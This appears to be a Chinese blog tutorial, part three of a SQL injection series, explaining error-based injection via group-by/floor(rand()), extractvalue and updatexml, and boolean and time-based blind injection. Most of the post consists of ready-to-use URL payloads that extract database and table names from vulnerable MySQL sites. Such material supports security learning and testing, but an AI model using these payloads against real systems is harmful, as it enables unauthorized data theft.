SQL注入(三)

最新推荐文章于 2024-08-07 22:18:55 发布
最新推荐文章于 2024-08-07 22:18:55 发布
阅读量3.7k 收藏
点赞数
分类专栏: 网络安全 文章标签: sql 数据库 database web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48914455/article/details/123171576
版权

之前使用的是联合查询,这次使用报错注入

在注入点的判断中,如果发现数据库中的报错信息会直接显示在页面中,则可以用报错注入

group by 重复键冲突报错

查表名

URL:select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 0,1) ," ",floor(rand()*2))x from information_schema.tables group by x)a

加粗的x跟a前面都其实是前面语句的别名,完成用法是“一大串语句” as 别名

其中as可以省略

XPATH报错

extractvalue函数

函数原型:extractvalue(xml_document,Xpath_string)
正常语法:extractvalue(xml_document,Xpath_string);
第一个参数:xml_document是string格式,为xml文档对象的名称
第二个参数:Xpath_string是xpath格式的字符串
第二个参数是要求符合xpath语法的字符串,如果不满足要求,则会报错,并且将查询结果放在报错信息里,因此可以利用

URL后加:and extractvalue(1,concat('~',(select database()),'~'))

~是添加的连接符,可以换成‘#’、‘$‘等不满足xpath格式的字符,实践中最好把~换成十六进制

注意低版本的MySQL没有这个函数

extractvalue()能查询字符串的最大长度为32,如果我们想要的结果超过32,就要用substring()函数截取或limit分页,一次查看最多32位

updataxml函数

函数原型:updatexml(xml_document,xpath_string,new_value)
正常语法:updatexml(xml_document,xpath_string,new_value)
第一个参数:xml_document是string格式,为xml文档对象的名称 第二个参数:xpath_string是xpath格式的字符串
第三个参数:new_value是string格式,替换查找到的负荷条件的数据 作用:改变文档中符合条件的节点的值

第二个参数跟extractvalue函数的第二个参数一样,因此也可以利用,且利用方式相同

URL后加:and updatexml("1",concat('~',(select database())),"1")

 如果页面存在布尔状态可以使用布尔盲注

猜数据库名长度

URL后加:and length(database())=1 通过改变数字判断数据库名长度

URL后加:and ascii(substr(database(),1,1))=99 判断数据库名第一个单词

substr(字符串,第几个开始,长度)

或者延时注入

 URL后加:and if((length(database())=3),sleep(5),1)

 URL后加:and if((ascii(substr(database(),1,1))=99),sleep(5),1)

EVA_CGZ
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLmap
m0_65332604的博客
04-06 2121
SQLmap
web安全-SQL注入
qq_41103091的博客
03-22 438
注入又分为:sql注入、xml注入、代码注入 sql注入例如mybatis使用#{}避免sql注入,xml注入使用excape或其他编码方式防止注入,代码注入例如提交一段js代码后台应用程序执行此JS代码,对抗代码注入,需要禁止使用eval()等可以执行命令的函数 DDOS攻击 常见的DDOS攻击有SYN flood、UDP flood、ICMP flood等,因此TCP设计缺陷攻击者能一直发送第一次握手信息(SYN = 1 ,Seq = x) Syn_Flood防御方式 cookie源认证: 原理是syn
SQL注入
qq_46219965的博客
08-29 774
SQL注入步骤 注入手法:联合查询,报错注入,布尔盲注,延时注入
sql注入之报错注入
weixin_45711977的博客
06-24 323
报错注入
SQL注入----报错注入简介(updatexml)
一只web狗
06-21 3459
报错注入(updatexml)常用语句
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
sql注入讲解ppt.pptx
08-10
SQL 注入工具和环境搭建: 1. PHPStudy:快速搭建 web 环境,包含 MySQL 数据库。 2. SQLi-Labs:SQL 注入的靶场,提供了不同知识点的题目,需要与 PHPStudy 结合使用。 3. Hackbar:写注入的 payload 的工具,...
pangolinsdl—sql注入工具
06-20
**SQL注入工具——PangolinsDL详解** SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和...
sql注入网站源码
04-09
7. **代码审计**:定期进行代码审查,查找可能的SQL注入漏洞,尤其是在使用第方库或组件时。 8. **Web应用防火墙(WAF)**:可以配置WAF来检测并阻止SQL注入攻击,但不应完全依赖它,因为攻击者可能找到绕过WAF的...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
SQL注入学习笔记
qq_51637038的博客
07-30 244
SQL注入漏洞产生的原因是数据库对用户上传的参数没有进行验证和过滤,导致其可以用特殊符号闭合等方式拼接SQL语句到数据库执行,从而得到数据库内部数据。 union注入: 当判定网站对特殊符号没有进行过滤时,可通过在参数后添加单引号等特殊符号将参数闭合,再使用union拼接相应的SQL语句,传入数据库中正常执行。只要拼接合适的SQL语句即可查询自己想要得到的信息。 假设数据库SQL语句为 select * from users where id='xxx'......,xxx为用户输入的数据,若将输入
SQL注入知识总结
ma963852的博客
03-30 9834
目录 漏洞原理 漏洞危害 利用方式 手工注入 手工注入步骤-基于联合查询: 1、判断注入类型 ​2、查询字段数 3、判断回显位 4、查询数据库的基本信息 5、查询数据库中的数据 报错注入 xpath语法错误 ​ 无回显无报错 1,布尔盲注 2,时间盲注 3,带外注入 4,SQL注入命令执行一 4,SQL注入命令执行二 堆叠注入 HTTP头注入 宽字节注入 二次注入 自动化注入 SQLMAP sqlmap特性 输出的内容 设定目标 综...
学习基于extractvalue()和updatexml()的报错注入
热门推荐
超人学飞的日子
06-09 5万+
extractvalue()extractvalue() :对XML文档进行查询的函数其实就是相当于我们熟悉的HTML文件中用 <div><p><a>标签查找元素一样语法:extractvalue(目标xml文档,xml路径)第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报...
mysql extractvalue_Sqli-labs Less-17 使用extractvalue()函数进行报错注入
weixin_34378978的博客
02-01 836
本关我们可以看到是一个修改密码的过程,利用的是update语句,与在用select时是一样的,我们仅需要将原先的闭合,构造自己的payload。尝试报错Username:adminPassword:1'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server versio...
【ctf】简单说明报错型注入floor()和updataxml原理
chualam的博客
11-02 551
floor rand group by 缺一不可 报错原理 floor(rand(0)*2)x 中floor负责把生成的随机数的小数去掉 但是(0)*2严格来说不算随机数 他的生成形式基本为011 所以能肯定导致报错 如果是rand()*2就会不可控 我是这么理解的:它一共有五次操作 如下: 由011011的这种形式 第一个生成的数字是0 他会检查有没有为0的名(key) 结果当然是没有(第一次操作) 所以会插入一个虚拟表 但是在插入过程中要再取一次group by 后面的值 即再进行一次运算
SQL注入03】报错注入实例操作
Fighting_hawk的博客
02-18 3529
1. SQL注入优先级:union注入>报错注入>布尔盲注>延迟注入; 2. 了解报错注入常用的几个命令; 3. 掌握使用updataxml()函数进行报错注入; 4. updataxml()对仅能获取返回32位字符,对于长字符串需要分批次获取。...
SQL注入---报错注入
qq_41592307的博客
09-03 310
报错注入 1、报错注入的原理 由于后台没有对报错信息进行过滤,报错信息会显示在前端,可以使用指定的函数来制造报错,由 此来获取数据信息。 2、报错函数 extractvalue(xml_frag,xpath_expr):对XML文档数据进行查询的XPATH函数 如果Xpath的输入错误,则会将错误信息结果显示在前端。 注:extractvalue()和updatexml()函数查询的最大长度为32位,如果超过32位则需要使用 substring()函数截取 ...
Dav_笔记12:Automatic SQL Tuning 之 5 managing SQL Profiles
最新发布
Dav_2099的博客
08-07 1080
SQL配置文件包含对自动SQL调整期间发现的较差优化程序估计值的更正。此信息可以改进优化器基数和选择性估计,从而导致优化器选择更好的计划。SQL配置文件不包含有关各个执行计划的信息。相反,优化程序在选择计划时具有以下信息源:■环境,包含数据库配置,绑定变量值,优化程序统计信息,数据集等■SQL配置文件中的补充统计信息如果环境或SQL配置文件发生更改,则优化程序可以创建新计划。您可以使用SQL配置文件,无论是否有SQL计划管理。如果使用SQL计划管理,则优化程序选择的计划必须是已启用的计划基准。
dbeaver 导入sql 报错,ERROR 2059 (HY000)
hyq_07_27的博客
08-07 206
ERROR 2059 (HY000): Authentication plugin ‘caching_sha2_password’ cannot be loaded: 鎵句笉鍒版寚瀹氱殑妯″潡銆�。下载后解压压缩包,点击“添加数据库地址”按钮,选择新的MySQL8的所在目录.再次导入就可以了。可以下载 MySQL免安装版配置教程mysql-8.0.39-winx64.zip。先mysql连接设置,查看一下dbeaver的mysql 版本,是5.5.62.版本问题,MySQL8之后更换了密码认证策略。
SQL注入攻击技术详解
"SQL注入实战教程,涵盖ACCESS、MySQLSQL SERVER和ORACLE的注入技巧,由讲师闵海钊讲解,内容包括注入点检测、表名和列名的猜解、长度判断等。" SQL注入是一种常见的网络安全攻击手段,攻击者通过在Web应用的输入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值